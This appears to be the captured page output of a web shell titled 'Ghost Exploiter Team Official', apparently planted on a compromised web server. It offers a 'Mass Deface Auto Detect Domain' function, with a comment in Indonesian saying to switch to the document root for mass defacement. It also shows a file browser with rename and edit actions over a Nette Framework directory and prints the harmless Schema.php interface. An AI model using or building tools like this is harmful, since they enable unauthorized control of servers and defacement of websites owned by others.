Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
nette
/
schema
/
src
/
Schema
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Elements
--
ren
Context.php
1.057KB
edt
ren
DynamicParameter.php
0.217KB
edt
ren
Expect.php
2.728KB
edt
ren
Helpers.php
5.101KB
edt
ren
Message.php
2.743KB
edt
ren
Processor.php
1.896KB
edt
ren
Schema.php
0.572KB
edt
ren
ValidationException.php
0.835KB
edt
ren
<?php /** * This file is part of the Nette Framework (https://nette.org) * Copyright (c) 2004 David Grudl (https://davidgrudl.com) */ declare(strict_types=1); namespace Nette\Schema; interface Schema { /** * Normalization. * @return mixed */ function normalize(mixed $value, Context $context); /** * Merging. * @return mixed */ function merge(mixed $value, mixed $base); /** * Validation and finalization. * @return mixed */ function complete(mixed $value, Context $context); /** * @return mixed */ function completeDefault(Context $context); }